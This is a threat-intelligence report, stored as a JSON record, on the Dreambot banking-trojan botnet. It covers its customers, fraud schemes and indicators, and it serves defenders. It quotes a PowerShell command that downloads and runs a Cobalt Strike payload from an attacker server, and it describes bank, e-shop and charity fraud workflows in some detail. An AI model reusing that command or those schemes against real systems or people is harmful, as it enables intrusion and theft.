{
	"id": "b8a972fa-ad55-4725-80d2-4a2ed10e8b2e",
	"created_at": "2026-04-06T00:09:38.52524Z",
	"updated_at": "2026-04-10T03:28:24.33003Z",
	"deleted_at": null,
	"sha1_hash": "a71c007f20d98d8724bb35a58f935d7cb35409af",
	"title": "The end of Dreambot? Obituary for a loved piece of Gozi.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2891880,
	"plain_text": "The end of Dreambot? Obituary for a loved piece of Gozi.\r\nBy Benoit ANCEL\r\nPublished: 2020-05-01 · Archived: 2026-04-05 16:00:25 UTC\r\nDreambot seems to finally be out of service after +6 years of activity. The back-end servers of the botnet are down\r\nfor a few weeks now, the onion C\u0026Cs are down too, and it seems that no new samples have been found in the\r\nwild since March 2020.\r\nThe lack of new features? The multiplication of new Gozi variants? The huge rise of Zloader? COVID-19? We\r\ncan’t be sure exactly what was the cause of death, but more and more indicators point at the end of Dreambot.\r\nNow, more than ever, the history of botnets is essential to have a deep understanding of the evolving cyber-crime\r\nindustry. It’s time to tell some stories we learned while researching this very interesting malware operation.\r\nWhat was Dreambot?\r\nMentioned publicly for the first time by IBM and detailed by Proofpoint and FoxIT, Dreambot was a botnet\r\nprimary used to commit bank fraud.\r\nBased on the leaked source code of ISFB, Dreambot was simply another Gozi fork but with a singular feature\r\nmaking it easy to identify: the support of Tor C\u0026Cs.\r\nDreambot was a common banking trojan, having all the usual features:\r\nWebinjects\r\nVNC\r\nSocks\r\nKeylogging\r\nFormGrabbing\r\nEmail stealer\r\nCookie stealer\r\nPassword stealer\r\nScreenshots/Video\r\nBackdoor\r\nBootkit\r\nAs mentioned by Maciej Kotowicz, Dreambot was very close to another IFSB fork recently back in the wild\r\ncalled IAP.\r\nISFB, Still Live and Kicking — Maciej Kotowicz, Botconf 2016\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 1 of 22\n\nBusiness model\r\nDreambot was using a traditional business model. You pay the administrators and they give you a C\u0026C server, a\r\nway to protect your C\u0026C domains (DGA / P2P and switching between Brazzzzers and Sandiflux/Fluxxy Fast\r\nFlux) and an un-crypted build with a dedicated SERPENT key used to identify each customer of the botnet.\r\nStarting with that, a Dreambot customer can use whatever way he wants to spread the malware and manage his\r\nvictims. Most of the time, a customer receives a server as C\u0026C and keeps using the same IP for the C\u0026C server\r\nuntil the end of his contract. At the end of the contract, his IP and his SERPENT key is reused for another client.\r\nPress enter or click to view image in full size\r\nSupposed advertisement of Dreambot from 2014\r\nThe Dreambot operators also provide their customers a tool to create, configure and encrypt their Webinjects,\r\ncalled ICS. It is based on the similar leaked ISFB tool, Config.exe.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 2 of 22\n\nICS used to craft config and webinjects\r\nVery popular in Japan associated to URLZone, Dreambot was used in other parts of the world as well: USA,\r\nCanada, Europe, Asia, Australia.\r\nSince the Dreambot customer base was very volatile (some customers only stay for a couple of months) it’s very\r\nlikely that we also missed a lot of different campaigns.\r\nExample of campaigns:\r\nSophisticated Dropper Masqueraded as Fake DHL Invoice to Distribute Ursnif Malware\r\nDreamBot Campaign Dreams Big\r\nPolish malspam with XLS attachment pushes Ursnif\r\nJPCERT/CC Incident Handling Report\r\nDreambot (11.13.2019) — Document analysis\r\nNew Ursnif trojan variant targets ‘tens of thousands of users’ across Japan\r\nDreambot Banking Trojan Delivered via Resume-Themed Email\r\nNew Ursnif Campaign: A Shift from PowerShell to Mshta\r\nIcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution\r\nDetection Content: Finding Ursnif Trojan Activity\r\nBanking Trojan Targets Czech and Slovenian Speakers\r\nAttack Vectors Behind Online Banking Malware “DreamBot” Targets Japan\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 3 of 22\n\nMalware Tales: Dreambot\r\nMalvertising Chain Leads to the HookAds Campaign. RIG Drops Dreambot.\r\nDreambot Dropped by HookAds\r\nRIG EK at 188.225.76.222 Drops Dreambot\r\nCustomer volatility also makes it hard to measure the real number of victims, even though we counted more than a\r\nmillion infections world-wide just for 2019.\r\nAnd if Dreambot was not hard enough to track, we also observed different clients of Dreambot reselling access to\r\ntheir C\u0026C in order to share the fraud.\r\nWhen you try to identify a Dreambot client by the SERPENT key used, time is a really important factor. Since the\r\nkeys are always reused, an SERPENT key value in 2017 can (and probably is) still used in 2019 but not by the\r\nsame Dreambot customer. The best way to track a Dreambot customer (or other banking trojan for that matter) is\r\nprobably by following the webinjects configurations.\r\nExamples of SERPENT keys observed in the wild:\r\n00DONPORT7710209\r\n0WADGyh7SUCs1i2V\r\n0XOT6QaGzY7j9dhy\r\n10274948AOQPNTBB\r\n36694321POIRYTRI\r\n87654321POIUYTRE\r\n87677321POIRYTRI\r\n87694321POIRYTRI\r\nA4F6421F93DF49AF\r\nA79CE7E04B4C9A6A\r\nCBA16FFC891E31A5\r\nDB23B3470D0CF889\r\nDfei8OoQ0xhjTyql\r\nGFL4R4F6Cw5nFYnA\r\nK74USJY728910OA1\r\nOvZz8XVH91INT7ek\r\nPHZ4OVL2QLI0N8WN\r\nq1a2z3w4s5x6e7d8\r\nQp1FMx2VswbqKjX0\r\ns4Sc9mDb35Ayj8oO\r\nV86iYRDA2FSEqWzL\r\nVm3hI8Nfe5xR0hPW\r\nY46frPcNAJQGl6KT\r\nKTXDkwvQHiBLP2OV\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 4 of 22\n\ndJReCsX8qWlhQ0kv\r\nWIdtM3YCfxhwrbV1\r\nExamples of onion domains observed in the wild:\r\n2ud3gaufzaiikf3e.onion\r\naaxvkah7dudzoloq.onion\r\naeeeeeeeeeeeeeeeeeeeeeeeeeeeva.onion\r\ncbt3milmkp32ou4w.onion\r\ncxzko43pnr7ujnte.onion\r\nerreg34983gy89g389g89459.onion\r\ngfgyucg4ot3q3qno.onion\r\niod5tem372udbzu2.onion\r\nkzuzxhlardmkvwwg.onion\r\nly3sxhs55czhsb3u.onion\r\ns2mf5op7sjtonnkv.onion\r\nvoekeyq7k5vyeg4z.onion\r\nwdwefwefwwfewdefewfwefw.onion\r\ney7kuuklgieop2pq.onion\r\njm2g6cyszkutaurp.onion\r\nh33a7jzovxp2dxfg.onion\r\nwuodygsb2cevqgh5.onion\r\n6vcatkjlim35nscu.onion\r\nDreambot panels\r\nOver the time we observed 3 different versions of the Dreambot panel always hosted on port 3000 of the C\u0026C.\r\nEach customer seemed to be able to choose what version of the panel they wanted.\r\nThat first version was still used by a customer until 2020. Revealed by Maciej Kotowicz in 2016, that panel\r\ndeveloped in Perl was simple, but effective. All features were quickly available to the customers with different\r\nexport possibilities and Jabber alerts. The biggest problem with that version was probably the fact that Perl is hard\r\nto maintain today, and the way the data was indexed in the database was making the server very slow to reply\r\nwhen the operators reached 100,000 bots, with key-logging and form-grabbing data.\r\nAn update of that Perl panel was deployed to some customers. It’s the same mechanisms with minor UI\r\nimprovements:\r\nBoth of those versions were protected by the same web login:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 5 of 22\n\nDreambot login\r\nFun fact around that login page: the Rarog botnet developed by Foxovsky was using the exact same login page.\r\nCoincidence, cooperation or copy paste? We never found the answer.\r\nAnd finally, the latest version of the panel, developed from scratch in PHP with a MongoDB database, was the\r\nmost used.\r\nThe source code of that panel seems to show that it has been created by a new developer, not affiliated to the\r\ndevelopment of the malware itself:\r\nThat version has the big advantage to be protected by VPN authentication, making the C\u0026C more resilient.\r\nThe C\u0026C had 3 different ports open:\r\n333: used by the bots to contact the gate\r\n555: used to load different binaries from the C\u0026C\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 6 of 22\n\n3000: used for the admin interface\r\nDreambot clients\r\nAs mentioned previously, Dreambot was used by plenty of different carders. Some groups used it for a few weeks,\r\nwhile others seemed to be there since the very beginning of the botnet. Dreambot used to have plenty of\r\ncustomers, we are not going to mention all of them, but only the interesting ones.\r\nThe most intriguing story comes from one of those early adopters, a carder using the nickname of Jer.\r\nPress enter or click to view image in full size\r\n”Jer” as a user of a Dreambot C\u0026C\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 7 of 22\n\n“Jer” used as the issuer for his Dreambot C\u0026C SSL cert\r\nJer was the Dreambot customer using almost all the time builds with the SERPENT key s4Sc9mDb35Ayj8oO and\r\nthe onion domain iod5tem372udbzu2[.]onion. Jer was the one spreading Dreambot with URLZone during years\r\nand years targeting Japanese banks (but not only). You can find plenty of references of his campaigns over the\r\nInternet.\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 8 of 22\n\nExample of Jer’s campaign provided by the Amazing work of Kafeine\r\nJer seems to have played a higher role than being just a customer for Dreambot. During the monitoring of new\r\nDreambot customers, we observed that each time a carder was reaching the end of his contract, the infected\r\ncomputers controlled by their panel would receive a new configuration, routing them to another Dreambot C\u0026C -\r\nJer’s C\u0026C.\r\nAt the end of 2018, Jer was dealing with more than 200,000 bots from around the world collected from his own\r\ncampaigns (using most of the time the Cutwail Spambot) and from former Dreambot customers.\r\nWe managed to observe that Jer was defrauding different banks around the world, and it seems this was not even\r\nhis main business.\r\nOne of the very important features of Dreambot is the capability to drop a 2nd stage implant to any infected bot.\r\nThat feature opened all kinds of opportunities for the operators.\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 9 of 22\n\nAfter digging Jer’s targets in 2018, we observed various victims (government organizations, large institutions, big\r\ncompanies) being infected at the same time by unknown 2nd stage implants. That behaviour led us to think that\r\nJer was also probably reselling access to some of his valuable victims to other 3rd parties — which is something\r\nvery common and profitable in the world of carders.\r\nAt the end of 2018, Jer left his old C\u0026C for a new fresh server, with the latest version of the panel. His old server\r\nwas then used by a new, very interesting carder. We will call him Bagsu.\r\nBagsu is an old and well known carder, client of different botnets like Emotet, Zloader or Trickbot (and Trickbot\r\nAnchor), focusing his business on:\r\nTargeting German Banks\r\nReselling loads to other carders\r\nThe Bagsu case is a very good example to show the capabilities and what TTPs to expect when you are infected\r\nwith a modern banking trojan.\r\nBanking trojan, but not only\r\nWhen you work in a defensive team doing forensic, it’s important to know the capabilities of the malware you are\r\nanalyzing in order to understand the perimeter of the potential breach you are analyzing.\r\nWhen a computer is infected with a banking trojan, the biggest mistake an investigator can make is to think that\r\n“it is not that bad, this user doesn’t deal with financial data anyway” — but the reality is far more complex.\r\nBanking trojans are before everything trojans. Most of them embed features such as webinjects, but the operators\r\nof these trojans will try to make money via every way possible, even if the victim is not dealing with financial\r\ndata.\r\nBagsu is the perfect example for such monetization techniques and we are going to showcase all the different\r\nways that were used over the time.\r\nBagsu is an individual, but it could very well be a carding gang. Carding is not about infecting millions of people,\r\nclicking on a magic “get rich” button and taking the money. Each bot needs to be inspected to see how you can\r\nmake profit from it and when you receive a thousand new bots by day, it is almost impossible to work alone. Most\r\nof the times, if you want to fraud a bank transfer, you need to have the victim online with his smartphone, steal the\r\n2FA code, etc. It’s a 24/7 job that can’t be done by just one person.\r\nAnd when you analyze a C\u0026C like this one you can see than almost every single bot has been checked manually\r\nand a comment has been set to indicate what kind of fraud is doable\r\nPress enter or click to view image in full size\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 10 of 22\n\nThe complexity of this operation indicates a carding gang is more likely behind this, rather than just an individual.\r\nBehind such a fraud operation you often have:\r\nPeople maintaining the malware (here the Dreambot developers)\r\nPeople spreading your malware (Exploit kit operator, spammers etc)\r\nPeople analyzing each bot to identify how to steal money from it\r\nNetwork operators to navigate inside a company from a victim\r\n3rd parties to engage in specific fraud like ransomware or BEC\r\nVarious money laundering networks\r\nFrom this single carding gang, we managed to observe Dreambot being used to do:\r\nDirect bank fraud\r\neShop fraud\r\nBEC fraud\r\nVarious scams\r\nPOS / Hotel fraud\r\nRansomware attacks\r\nAnd that behaviour applies to all major so-called banking trojans of the market. Dreambot, all the Gozi forks,\r\nDridex, Trickbot, ZLoader, Danabot etc, it is never a single actor, but plenty of different carding gangs with plenty\r\nof different operations with the same objective: making money.\r\nGet Benoit ANCEL’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 11 of 22\n\nAnother point to consider when collecting intelligence around the carding industry is that most of the time a\r\ncarder is not a client of just a single banking trojan. As we will show here with Bagsu, some carders are often\r\nclients of different botnets at the same time.\r\nThe classic bank fraud\r\nLet’s describe the classic bank fraud committed by the Bagsu gang: the direct bank fraud. The Bagsu gang works\r\nmostly against German banks but thanks to Dreambot they are also working with 3rd parties to commit fraud in\r\nUSA, Canada and even Romania or Poland, for maximizing the profits.\r\nThose attacks are mostly targeted against individuals or companies, but we also observed the Bagsu gang using\r\nDreambot to target bank employees directly:\r\nIt’s quite simple: Dreambot is distributed in order to infect people. After the infection, a webinject is deployed by\r\nDreambot on the victim browsers and when that victims logs into the online banking service, credentials are\r\nintercepted to be later reused by the carder. This behavior is today well documented, for example the paper of\r\nJean-Ian Boutin “The evolution of webinjects”.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 12 of 22\n\nExample of webinjects used by the Bagsu gang in Germany against Targo bank\r\nBut in 2020, stealing online banking credentials from somebody is not enough to steal money. Almost every bank\r\nis now deploying tons of heuristics in order to see if the computer using those credentials is the real user or not.\r\nYou cannot take Tor Browser and login into a bank account. Like that, an alert would be raised at the bank and the\r\naccount would be blocked pending further investigation. That’s why carders use a VNC connection to the victim's\r\ncomputer or a SOCKS proxy to tunnel their connection.\r\nDreambot offers both of those techniques by design. When a victim is infected by Dreambot, a VNC connection\r\nand/or a SOCKS proxy is set-up on the victim computer.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 13 of 22\n\nExample of VNC / Socks management by Dreambot\r\nThe carder sets up a VNC and a SOCKS server somewhere (in that example at 185.212.149.162) and each\r\nDreambot victim is connected to that server via a dedicated port. When the carder needs to commit a fraud, he will\r\nconnect directly to the victim's computer by using that VNC server and just like that he would be on the same\r\ncomputer at the same time with the victim, operating over a hidden desktop.\r\nSOCKS or VNC can be useful in different ways. When you want to only bypass localization restriction, a SOCKS\r\nproxy is enough. You can have the same IP as the victim and bypass localization heuristics. But today most of the\r\nbanks also implement other fingerprinting techniques. If you don’t use the same browser with the same plugins,\r\nyou will end up with the bank account blocked very quickly. That’s why nowadays carders prefer using VNC.\r\nVNC is the perfect technology since you use the exact same computer as the victim, and today VNC reselling is a\r\nhugely underestimated business in the carding industry. VNC “back-connects” are often considered to be low\r\nprofile malware but that is where a lot of banking fraud is coming from. If a carder is smart enough, he doesn’t\r\neven need to use a webinject malware to fraud banks, he just needs to buy a list of VNC IPs and observe and/or\r\ndrop different info-stealers to understand how to defraud the victim.\r\nAnother important point is that, from a forensics point of view, the VNC/SOCKS connections are often the easiest\r\nmalicious behaviour to catch during an attack. A process like explorer.exe or svchost sending requests to a server\r\nvia a strange port can be way easier to detect than a Tor connection or a C\u0026C decoy.\r\nLet’s resume:\r\nThe Bagsu gang infects targets with Dreambot.\r\nDreambot provides the needed credentials / keylogging / VNC / SOCKS\r\nThe Bagsu gang uses VNC to connect to the online banking account in order to launch a bank transfer\r\nEven so, for successfully defrauding European banks in 2020 you need to also intercept the 2FA codes via the\r\nvictim’s smartphone.\r\nIn order to bypass 2FA, the Bagsu gang will use an Android malware. When a victim browser is injected by a\r\nwebinject and when that victim will go to his online banking service, the Bagsu gang will use the webinject to\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 14 of 22\n\ndisplay an alert to the victim saying “If you still want to use our online banking website, it is now mandatory to\r\ninstall our new mobile application”\r\nExample of webinject used to lure a victim\r\nThat webinject will propose 3 ways for the victim to install the APK (outside the Play Store):\r\nLink received by SMS\r\nQR Code to scan\r\nADB manipulation\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 15 of 22\n\nExample of SMS received by the victims\r\nThis malware has been recently described by Pavel Asinovsky from IBM and named TrickMo, due to the fact that\r\nit was caught during a Trickbot fraud.\r\nDespite the excellent article by IBM, that Android malware is unfortunately not really an exclusive part of\r\nTrickbot. The Bagsu gang was a client of both Dreambot and Trickbot at some point and was using that malware\r\nto fraud banks via both of those botnets. That APK is a tool used by the Bagsu gang since at least 2014 over plenty\r\nof botnets.\r\nOld C\u0026Cs for that Android malware for the malware palaeontologists:\r\nfacebouk[.]net\r\nweb5401[.]com\r\n178.79.145[.]141\r\nwebnat[.]host\r\nNow, the Bagsu gang can run a full fraud by leveraging webinjects to initiate malicious bank transfers and launder\r\nthe proceeds via a money mule network.\r\nThe big picture of this fraud shows the complexity of the tools used by a carder gang. Looking at Dreambot only,\r\nat the VNC connection only or at the Android part only can lead to confusing threat intelligence attribution,\r\nignoring the connection between different tools related to a malware like Dreambot.\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 16 of 22\n\nAnd again, that operation is run by only one client of Dreambot, the others are using different TTPs to defraud\r\nbanks. We have observed some Dreambot customers using the Anubis Android malware in one instance.\r\nNow let’s have a look at a second type of financial fraud perpetrated by the Bagsu gang using Dreambot —\r\neCommerce fraud.\r\neCommerce fraud: the new gold\r\nHistorically, Bagsu was good at defrauding banks. That fraud alone involved a lot of skills and since nobody can\r\nbe good at everything at the same time, or have the time to do everything at once (all these carders are human with\r\nreal life problems like kids etc), he had to hire various partners to commit frauds out of his reach. This is exactly\r\nthe case of the eCommerce fraud.\r\nDefrauding eShops is quite similar to doing bank fraud. The big differences being that it’s way easier to launder\r\nmoney stolen from an eShop.\r\nTo organize their eCommerce fraud operations, the Bagsu gang paid a “fraud monkey” called G25. His role was to\r\nconnect to the Dreambot C\u0026C and catch (via key-logging data, form grabbing data, webinjects etc.) every single\r\nperson using eCommerce platforms such as eBay, Paypal or Amazon.\r\nPress enter or click to view image in full size\r\nExample of comments leaved by G25\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 17 of 22\n\nThe game is to retrieve Amazon accounts, for example, and use those accounts to order valuable goods\r\n(smartphones, laptops, video game consoles, graphics cards) and send those goods to someone who then resells\r\nthem and returns the “cashed out” (clean) money.\r\neShops have way less fraud detection mechanisms set in place compared to banks, so most of the time a SOCKS\r\nproxy is enough to connect to a victim’s Amazon account. The problem with defrauding eShops rests elsewhere.\r\nWhen G25 hacks an Amazon account, he cannot just order something from a German Amazon account and send\r\nthe package somewhere in Russia or China. Because of fraud detection heuristics , such an order will be blocked.\r\nAnd that’s a way bigger problem than with a bank transfer because to make it happen you don’t have any other\r\nchoice rather than having real people living near your victim to receive the goods.\r\nHiring people to intercept packages, store the goods and resell them is a full-time job by itself. It involves\r\ndedicating time, assuming risks and spending money. But thanks to the carding industry, defrauding packages is\r\nsuper easy.\r\nBasically, G25 needs somebody (a mule that he controls, through a job contract for example) who lives as close as\r\npossible to his Amazon victim. G25 needs to make sure the victim will send the fraudulent package to somebody\r\nelse without asking question and without stealing the fraudulent package. Stolen packages are a big problem in the\r\nmule business. Finally, G25 needs people to resell his goods and send him back the money.\r\nThis complex scheme is easy to implement today, thanks to the evolution of the carding industry. You can find\r\nplenty of services out there which offer you addresses around the world where carded packages can be sent.\r\nSuch services take care of everything: hiring the mules, routing the packages and selling the goods. All you must\r\ndo is send packages to that service and you can expect between 20% to 50% of the price of the stolen goods.\r\nPlenty of services like that exist over the internet, G25 over Dreambot was often using one called “Stuffer”:\r\nG25 just has to select a package mule closest to his victim, provide the package label to the Stuffer staff and wait\r\nfor profits. This is an easy and very efficient way to fraud and cash out money.\r\nWe have observed a huge number of packages frauded over Dreambot but today this is a very common scam used\r\nby a lot of criminals from carders to the passwords stealers operators.\r\nIt’s an easy way to make a profit from victims who are not using online services but can provide other\r\nmonetization opportunities for the fraudsters.\r\nLet’s now take a look at the more complex way used by the Bagsu gang over Dreambot to make profits.\r\nPoint of Sales / Hotels: the carding cornucopia\r\nWith Dreambot, there are various bots available, allowing attackers to set foothold in various types of victim\r\norganizations. But some victims are more valuable than others for a carder.\r\nHotels, restaurants or any company using PoS terminals are real gold for a team like the Bagsu gang. A lot of\r\ncredit cards are available on a daily basis on various poorly secured computer systems.\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 18 of 22\n\nThe biggest problem is that the victims infected by Dreambot rarely use a restaurant or a hotel PoS. The gang\r\nneeds to identify which victims have potential and do lateral movement inside the victim organization to gain\r\naccess to the valuable computers.\r\nThese attacks are high value for the cyber-criminals and are a pure nightmare for the forensic teams.\r\nLet’s take this example:\r\nPress enter or click to view image in full size\r\nYou can see here a Dreambot victim who was infected on the 14th of November 2018. The Bagsu gang quickly\r\nidentified the endpoint as being part of a hotel chain, with potential access to PoS terminals. To gain access to\r\nthose PoS, Bagsu needs to drop some lateral movement tools.\r\nThe 20th of November (6 days after the infection) Bagsu decides to drop an unknown 2nd stage malware to that\r\nvictim in order to move on with the attack. That 6 days delay after initial infection makes it hard for researchers to\r\ntrack Dreambot by relying on a one-time sandbox detonation. This case also presents a real nightmare for the\r\nforensics team, from an attribution perspective.\r\nEach time the Bagsu gang needed to move laterally, they used the same kind of tools. Most often they used Cobalt\r\nStrike in combination with the PyXie RAT. We observed a lot of Cobalt Strike instances ran by the Bagsu gang,\r\nused to infect others inside a company.\r\nExamples of Cobalt Strike instances observed:\r\nspineyes[.]club\r\n185.147.15[.]13\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 19 of 22\n\ncdn.greyrockland[.]com\r\n195.88.208[.]76\r\n94.156.189[.]217\r\napp.yourcellphonebiz[.]com\r\njs.choosebudget[.]com\r\n192.254.66[.]108\r\nWe are purposefully not going to attribute these Cobalt Strike instances to specific groups. Feel free to dig.\r\nFor some reasons, Cobalt Strike was not always used to move inside a company. Sometimes, more basic tricks\r\nwere used. One of those tricks was an email inbox stealer.\r\nThe Bagsu gang used Dreambot to drop an emails stealer tasked with exfiltrating the inbox and the contacts list of\r\nthe victim. The inbox and contacts list can be used later to craft “reply style” emails and insert a payload in a\r\nmiddle of real email discussion, to better lure the victim.\r\nThese advanced attacks are more complex to pull off, but when they succeed, they are way more profitable than\r\ntraditional individual bank fraud.\r\nAnother example of why an infection of “banking” trojan on a computer that doesn’t deal with financial data is\r\nstill extremely dangerous. Webinjects are a risk of course but as showed here it’s far from the biggest risk for a\r\ncompany.\r\nLet’s move to our last set of examples of fraud originally initiated from Dreambot.\r\nBEC fraud, ransomware and beyond\r\nWe have previously presented different, more or less elegant fraud methods, but of course not all the fraud\r\ncommitted by that gang over Dreambot is elegant.\r\nWe have observed the features of Dreambot being used to collect data about different vulnerable victims. The\r\ngang was sometimes using the VNC over Dreambot to target different private charities and NGOs.\r\nThe game was to access to the mailbox of the victim charity and send an email asking the usual donors for new\r\ndonations.\r\nHello Guys!!\r\nIt has almost been a year!! We a gearing up for Birth Mothers Day on May 9th.\r\nWould you be will to donation again?\r\nAfter jumping into the email exchange between the donors and the charity, the Dreambot operators pretending to\r\nbe the charity mentioned bank problems to the potential donors, and new (fraudulent) bank details were provided.\r\nThe donors would then send money to the criminal bank accounts, while the charities never saw any of the\r\ndonations.\r\nSimple but very effective attacks conducted thanks again to Dreambot.\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 20 of 22\n\nAnother powerful example of attack endgame is to deploy ransomware. These attacks sometimes well\r\ndocumented like the Ryuk/Trickbot combination are not only the Trickbot business. We can observe this behavior\r\nwith almost every big botnet, and Dreambot is not an exception.\r\nWe have observed different ransomware attacks conducted via Dreambot in combination with Cobalt Strike.\r\nThe ransomware used remains still unknown to us today but all the IOCs point to the operation conducted around\r\nthe 777 group: https://tehtris.com/en/ransom-war-1/\r\nThis ransomware takes us to the last interesting story collected during the Dreambot monitoring operation.\r\nIn order to conduct a well-done ransomware operation, it’s often important to make sure that you have the\r\nmaximum privileges possible on the victim computers. The criminals can use plenty of tricks to achieve that, one\r\nof the most expensive is probably the usage of 0day LPE.\r\nDuring a specific ransomware attack conducted via the Dreambot C\u0026C on the 17th December 2019, we observed\r\nthe Bagsu gang dropping the usual Cobalt Strike implant simply by using the VNC on the computer victim and\r\ncopy pasting the command:\r\npowershell.exe -nop -w hidden -c “IEX ((new-object net.webclient .downloadstring\r\n(‘http://192.254.66[.]108:80/a’))”\r\nIt appears that Cobalt Strike was not enough to gain the required privileges on the the victims infrastructure, so the\r\nattackers used another method: a local privilege elevation exploit, CVE-2019–1458. For unknown reasons, the\r\nattacker dropped both the built exploit and the source code of that exploit:\r\nThat CVE was released by AMR from Kaspersky over an APT operation just 7 days before we found the source\r\ncode on that Dreambot operation.\r\nThis example shows the capability of these carding groups to leverage an array of tools, including a very fresh\r\n1day exploit. This is what makes attribution so hard even for what is considered to be a standard “banking trojan”\r\nlike Dreambot.\r\nFollowing these Dreambot operations shows us how intricate the net of relationships between various carding and\r\ncriminal groups can be.\r\nStarting with a carder doing bank fraud in Germany, we ended up exploring the huge network of existing links\r\nbetween all parts of the cybercrime ecosystem.\r\nThis shows how full attribution really is impossible when looking at an operation such as Dreambot (or Trickbot,\r\nZloader, Danabot, Emotet, all the Gozi) as one single, unique operation.\r\nWhile today Dreambot seems dead, we already saw the Bagsu gang now being a big customer of the infamous\r\nZLoader.\r\nConclusions\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 21 of 22\n\nBehind each big botnet there are hundreds of different people working with different TTPs while having different\r\nobjectives. Analyzing a botnet as one operation can lead to a lot of mistakes.\r\nPardon the clumsy metaphor but fighting cyber-crime by spending most efforts looking at Dreambot (or\r\nTrickbot or Emotet) as unique entities responsible for fraud is the equivalent of trying to solve a murder by\r\nspending most efforts looking at the brand of the gun.\r\nCarders use those banking trojans just as a tool today, so if Dreambot dies, they will continue their attacks and just\r\npay for another tool with the same features. The Bagsu gang here is a good example, successfully switching from\r\none botnet service provider to another whenever needed.\r\nTracking Dreambot only for the bank frauds would lead to missing almost 90% of the real attacks of that malware.\r\nWe tried to describe here a few of the interesting anecdotes we collected during our Dreambot research to help our\r\nforensic and blue team fellows protect their infrastructure.\r\nFighting cyber-crime by only focusing on the tools and not on the carders dehumanizes the criminals, making\r\nthem look like untouchable mythological monsters. In fact, we should look at cyber-criminals as human beings,\r\nwith life challenges such as having kids or being stuck at home due to COVID-19.\r\nYear after year, a lot of conspiracy theories are appearing within the threat intelligence space. Dreambot is a good\r\nexample here as the malware is still mistaken for Ursnif even today, because of the lack of public documentation\r\nof the Gozi evolution. Moreover, Dreambot was initially considered a local problem when in fact it had world-wide reach. The Dreambot operation was also considered a unique entity, when in fact it is the result of multiple\r\ncustomers operating simultaneously.\r\nIt’s a whole industry out there, in which criminals cooperate with each other as long as everybody makes money.\r\nThey all share hosters, packers, VNC servers, sometime a bot or two from a C\u0026C, they share their money mule\r\nnetworks, their webinject developers etc.\r\nThe carding industry today is as complex and powerful as the APT business.\r\nBut don’t give up the faith 🙂\r\nSpecial thanks to Kafeine, Maciej Kotowicz, Fumik0_ and Coldshell for their amazing work on Dreambot and all\r\nthe Gozi branches years after years. Nothing would have been possible without them.\r\nSource: https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 22 of 22",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122"
	],
	"report_names": [
		"the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4f39c998-5861-4f35-ac24-095653a8b615",
			"created_at": "2023-01-06T13:46:38.836253Z",
			"updated_at": "2026-04-10T02:00:03.116935Z",
			"deleted_at": null,
			"main_name": "HookAds",
			"aliases": [],
			"source_name": "MISPGALAXY:HookAds",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434178,
	"ts_updated_at": 1775791704,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
